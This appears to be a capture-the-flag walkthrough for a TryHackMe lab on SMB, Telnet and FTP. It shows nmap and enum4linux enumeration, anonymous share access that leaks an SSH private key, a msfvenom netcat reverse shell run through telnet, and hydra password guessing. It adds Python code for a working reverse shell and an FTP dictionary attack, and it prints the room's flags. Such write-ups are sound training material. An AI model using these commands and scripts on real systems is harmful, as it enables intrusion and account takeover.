https://tryhackme.com/access

SMB

SMB — Server Message Block Protocol — is a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network.

SMB is a request-response protocol: the client and server exchange several messages to negotiate a dialect, authenticate and connect to a share before any file is read. Today clients connect over TCP/IP, either directly on TCP port 445 or as NetBIOS over TCP/IP (RFC 1001 and RFC 1002) on port 139; the older NetBEUI and IPX/SPX transports are legacy and rarely seen.

Samba, an open source server that supports the SMB protocol, was released for Unix systems.


Enumerating SMB

Start the target machine first; the IP address it is assigned is the one we enumerate below.

1. Port Scanning

nmap -sC -sV -O -T4 10.49.143.109 -oN nmap_scan_network_service

Open ports:

22 — ssh

139 — Samba (NetBIOS session service, SMB over NetBIOS)

445 — Samba (SMB directly over TCP)
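As an added example (not part of the original walkthrough), here is a small Python parser that turns an nmap -oN report into the list of open ports and prints the follow-up enumeration commands used in this room. The report text is a constructed sample written in nmap's normal-output format, not real scan output, and the versions in it are made up; the target IP is just the one from the scan above.

```python
import re

# Constructed sample in nmap -oN format (made up for this example; not a real scan).
SAMPLE_REPORT = """\
# Nmap 7.80 scan initiated as: nmap -sC -sV -O -T4 10.49.143.109 -oN nmap_scan_network_service
Nmap scan report for 10.49.143.109
Host is up (0.045s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE     VERSION
21/tcp   filtered ftp
22/tcp   open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
| smb-security-mode:
|   account_used: guest
|_  authentication_level: user
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port line: "445/tcp  open  netbios-ssn  Samba smbd ...". Script output ("| ...")
# and the header line do not match, so they are skipped automatically.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

def parse_open_ports(report):
    """Return [(port, proto, service, version)] for every port nmap reports as open.
    Filtered/closed ports are dropped; they need no service enumeration."""
    ports = []
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group("state") == "open":
            ports.append((int(m.group("port")), m.group("proto"),
                          m.group("service"), m.group("version").strip()))
    return ports

# Service names nmap uses for SMB (Samba and Windows).
SMB_SERVICES = {"netbios-ssn", "microsoft-ds"}

def next_steps(target, ports):
    """Map the open ports to the enumeration commands from this walkthrough.
    SMB gets one pair of commands even when both 139 and 445 are open."""
    steps = []
    smb_done = False
    for port, proto, service, version in ports:
        if service in SMB_SERVICES:
            if not smb_done:
                steps.append(f"enum4linux -a {target}")
                steps.append(f"smbclient -L //{target} -N")   # -N: no password (null session)
                smb_done = True
        elif service == "ftp":
            steps.append(f"ftp {target}  # try the anonymous account")
        elif service == "telnet":
            steps.append(f"telnet {target} {port}")
        elif service == "ssh":
            steps.append(f"# ssh on {port}: revisit once a key or password turns up")
    return steps

if __name__ == "__main__":
    found = parse_open_ports(SAMPLE_REPORT)
    for entry in found:
        print(entry)
    print("\n".join(next_steps("10.49.143.109", found)))
```

The parser keys on the STATE column rather than on the port number, so a port that nmap reports as filtered (port 21 in the sample) is not queued for enumeration even though it appears in the report.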

2. Enum4linux

Enum4linux is a tool for enumerating information from Windows and Samba hosts over SMB: users, shares, groups, machine lists and the password policy. It is a wrapper around the Samba utilities (smbclient, rpcclient, net and nmblookup).

enum4linux 10.49.143.109

Syntax: enum4linux [options] ip

TAG: FUNCTION

-U: get userlist

-M: get machine list

-N: get namelist dump (different from -U and -M)

-S: get sharelist

-P: get password policy information

-G: get group and member list

-a: all of the above (full basic enumeration)

Types of SMB Exploit

While there are vulnerabilities such as CVE-2017-7494 (the Samba remote code execution bug) that allow exploiting SMB directly, you are more likely to encounter a situation where the best way into a system is a misconfiguration. In this case we exploit anonymous SMB share access, a common misconfiguration that leaks information leading to a shell.

SMBClient:

Syntax: smbclient //[IP]/[SHARE] -U [USERNAME] -p [PORT]

smbclient's -L flag lists a host's shares and -N skips the password prompt, which is the quickest way to confirm anonymous access before connecting to a particular share. Here the profiles share is readable without credentials; inside the smbclient session, ls lists the share and more fetches a file and pages through it:

smbclient //10.49.143.109/profiles -U Anonymous -p 445
ls
more "Working Form Home Information.txt"

The share also contains a .ssh directory. get downloads the private key into your current local directory:

cd .ssh
get id_rsa

Log in over SSH with the downloaded key (run chmod 600 id_rsa first; OpenSSH refuses to use a private key that other users can read):

ssh -i id_rsa cactus@10.49.143.109
ls
cat smb.txt

THM{smb_is_fun_eh?}

Telnet

Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server.

Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH where transmitted data is encrypted.

You can connect to a telnet server with the following syntax: "telnet [ip] [port]"

Enumerating Telnet:

  1. Port Scanning

First scan every TCP port (-p- covers all 65535; -Pn skips host discovery in case ICMP is blocked) with version detection:

nmap -Pn -vv -p- -sV 10.49.138.39 -oN telnet_nmap_scan

Then run an aggressive scan (-A: OS detection, version detection, default scripts and traceroute) against the single non-standard port the full scan turned up:

nmap -Pn -vv -A -p 8012 10.49.138.39 -oN telnet_8012_nmap_scan

Types of Telnet Exploit

Telnet, being a protocol, is in and of itself insecure for the reasons we talked about earlier. It lacks encryption, so sends all communication in plaintext, and for the most part has poor access control. There are CVEs for Telnet client and server software, however, so when exploiting, check a CVE database for the exact client and server versions found during enumeration.

What is a Reverse Shell?

A "shell" is a program that gives you command execution on a device; in pentesting the word also covers the payload or trick that delivers that execution.

A reverse shell is one in which the target machine opens the connection back to the attacking machine, which is waiting with a listener. This works even when a firewall blocks inbound connections to the target, because the connection is outbound from the target's point of view.

Connect to the service found on port 8012:

telnet 10.49.138.39 8012

Start a tcpdump listener on your local machine so you can see whether the target can reach you.

If using your own machine with the OpenVPN connection, use:

  • sudo tcpdump ip proto \\icmp -i tun0

If using the AttackBox, use:

  • sudo tcpdump ip proto \\icmp -i ens5

This starts a tcpdump listener that captures only ICMP traffic, the protocol ping uses (the interface name is whichever one carries your lab traffic; check with ip a if unsure). Then, in the telnet session, have the target ping your machine with a single packet. An echo request arriving at the listener proves that commands typed into the session are executed on the target, even though the session itself shows no output:

ping 192.168.186.9 -c 1

Reverse Shell Payload

Generate the payload with msfvenom (-p cmd/unix/reverse_netcat is a netcat reverse shell for Unix targets, lhost/lport point at your listener, and R prints the raw command instead of wrapping it in a file format):

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.186.9 lport=4444 R

Start a netcat listener in a new terminal tab:

nc -nvlp 4444

Then paste the generated command into the telnet session, prefixed with .RUN as shown:

.RUN mkfifo /tmp/rynjcid; nc 192.168.186.9 4444 0</tmp/rynjcid | /bin/sh >/tmp/rynjcid 2>&1; rm /tmp/rynjcid

Get shell!!!

ls
cat flag.txt

THM{y0u_g0t_th3_t3ln3t_fl4g}
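What the mkfifo one-liner above does, as an added example that is not part of the original walkthrough: the target connects out to the listener and hands the connected socket to /bin/sh as its stdin, stdout and stderr, so every line the attacker sends is executed and the output comes back over the same TCP connection. The Python below reproduces that mechanism on the loopback interface with attacker and victim in one process (Unix only; /bin/sh is assumed to exist). In a real engagement only the reverse_shell half runs on the target and the listener is the nc -nvlp 4444 from the walkthrough.

```python
import socket
import subprocess
import threading

def reverse_shell(lhost, lport):
    """Victim side: connect back to the listener and wire /bin/sh to the socket.
    Equivalent of `nc LHOST LPORT 0<fifo | /bin/sh >fifo 2>&1` from the msfvenom payload."""
    sock = socket.create_connection((lhost, lport))
    # The shell inherits the socket descriptor as stdin/stdout/stderr, so it reads
    # commands from the attacker and writes results straight back over the connection.
    proc = subprocess.Popen(["/bin/sh"], stdin=sock, stdout=sock, stderr=sock)
    proc.wait()
    sock.close()   # closing our end tells the listener the shell is gone

def start_listener(host="127.0.0.1", port=0):
    """Attacker side: the equivalent of `nc -nvlp PORT`. port=0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv

def drive_shell(srv, commands, timeout=10):
    """Accept the callback, send the commands, and collect everything the shell prints."""
    srv.settimeout(timeout)
    conn, _ = srv.accept()
    conn.settimeout(timeout)
    conn.sendall(("\n".join(commands) + "\nexit\n").encode())
    output = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:          # EOF: the shell exited and the victim closed its socket
            break
        output += chunk
    conn.close()
    return output.decode(errors="replace")

def demo(commands=("echo shell-ok", "echo $((6*7))")):
    """Run listener and victim in one process over loopback; return the shell's output."""
    srv = start_listener()
    lport = srv.getsockname()[1]
    victim = threading.Thread(target=reverse_shell, args=("127.0.0.1", lport), daemon=True)
    victim.start()
    try:
        return drive_shell(srv, list(commands))
    finally:
        srv.close()
        victim.join(timeout=5)

if __name__ == "__main__":
    print(demo(), end="")
```

Two details carry over to the netcat version: the payload uses a FIFO because a plain pipe is one-directional and the shell needs both to read commands and to write output, and because the shell's stderr is also redirected, error messages from failed commands reach the attacker rather than being lost on the target.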

FTP

File Transfer Protocol (FTP) is, as the name suggests, a protocol used to allow remote transfer of files over a network. It uses a client-server model to do this and, as we'll come on to later, separates commands from data so that transfers are efficient.

How does FTP work?

A typical FTP session operates using two channels:

  • a command (sometimes called the control) channel, the TCP connection to port 21 over which the client sends commands and receives status replies
  • a data channel, a second TCP connection opened for each directory listing or file transfer, either from the server back to the client (active mode) or from the client to a port the server announces (passive mode).

Like Telnet, FTP carries usernames, passwords and file contents in plaintext on both channels.

Enumerating FTP

  1. Port Scanning

nmap -Pn -vv -sV -sC 10.48.173.185 -oN FTP_nmap_scan

nmap's default scripts (-sC) report whether the server accepts anonymous logins. Connect with the ftp client, log in as anonymous, list the directory, download the notice and read it locally (the ftp client has no built-in pager; you have to get the file first):

ftp 10.48.173.185
ls
get PUBLIC_NOTICE.txt
quit

less PUBLIC_NOTICE.txt

Types of FTP Exploit

hydra:

Hydra is a very fast online password-guessing tool which can perform rapid dictionary attacks against more than 50 protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more. Being an online attack, every guess is a login attempt against the live service, so check for account lockout policies first and keep the parallelism low on fragile services.

The syntax for the command we're going to use to find the passwords is this:

"hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp"

Let's break it down:

SECTION: FUNCTION

hydra : Runs the hydra tool

-t 4 : Number of parallel connections per target

-l [user] : Points to the user whose account you're trying to compromise

-P [path to dictionary] : Points to the file containing the list of possible passwords

-vV : Sets verbose mode to very verbose; shows the login+pass combination for each attempt

[machine IP] : The IP address of the target machine

ftp / protocol : Sets the protocol

hydra -l mike -P /usr/share/wordlists/rockyou.txt 10.48.173.185 ftp
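As an added example (not part of the original walkthrough and not hydra's own code), the following Python reproduces the core of what the hydra command above does: take one username, walk a wordlist, try each candidate against the service with a fixed number of parallel attempts (hydra's -t), and stop at the first accepted login. ftp_login is a real FTP login attempt built on the standard library; the demo runs offline against a constructed stand-in login function and a constructed six-entry wordlist, so the host, user and secret in it are placeholders.

```python
import ftplib
import itertools
from concurrent.futures import ThreadPoolExecutor

def ftp_login(host, user, password, port=21, timeout=5):
    """One login attempt over FTP. True/False for accepted/rejected credentials.
    A connection failure is deliberately NOT caught: treating it as 'wrong password'
    would silently skip candidates whenever the service drops or rate-limits us."""
    try:
        with ftplib.FTP() as ftp:
            ftp.connect(host, port, timeout=timeout)
            ftp.login(user, password)
            return True
    except ftplib.error_perm:      # 530 Login incorrect
        return False

def load_wordlist(path):
    """rockyou.txt is not valid UTF-8 throughout, so decode leniently and yield lazily."""
    with open(path, "rb") as fh:
        for raw in fh:
            yield raw.rstrip(b"\r\n").decode("utf-8", errors="ignore")

def dictionary_attack(try_login, user, wordlist, tasks=4):
    """Try candidates for one user, `tasks` at a time (hydra's -t), stopping at the first hit.
    Returns (password, attempts) or (None, attempts). Candidates are consumed lazily, so a
    multi-million-line wordlist is never held in memory at once."""
    candidates = iter(wordlist)
    attempts = 0
    with ThreadPoolExecutor(max_workers=tasks) as pool:
        while True:
            batch = list(itertools.islice(candidates, tasks))
            if not batch:
                return None, attempts
            results = pool.map(lambda pw: try_login(user, pw), batch)
            for pw, ok in zip(batch, results):   # results come back in wordlist order
                attempts += 1
                if ok:
                    return pw, attempts

# --- constructed stand-in for a target so the example runs offline ---
def fake_ftp_login(secret):
    """Return a login function that accepts only `secret` (no network; demonstration only)."""
    def try_login(user, password):
        return password == secret
    return try_login

SAMPLE_WORDLIST = ["123456", "12345", "qwerty", "password", "iloveyou", "letmein"]

def demo():
    return dictionary_attack(fake_ftp_login("password"), "mike", SAMPLE_WORDLIST, tasks=4)

if __name__ == "__main__":
    print(demo())
    # Against a live host (placeholder IP) you would pass the real login function instead:
    # dictionary_attack(lambda u, p: ftp_login("10.48.173.185", u, p), "mike",
    #                   load_wordlist("/usr/share/wordlists/rockyou.txt"), tasks=4)
```

The attempt counter is the number hydra reports in its -vV output; with four tasks and the secret in fourth position the whole first batch is tried before the hit is seen, which is why parallelism trades a few wasted attempts for speed.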

Log in with the credentials hydra found (mike:password):

ftp 10.48.173.185
ls
less ftp.txt

THM{y0u_g0t_th3_ftp_fl4g}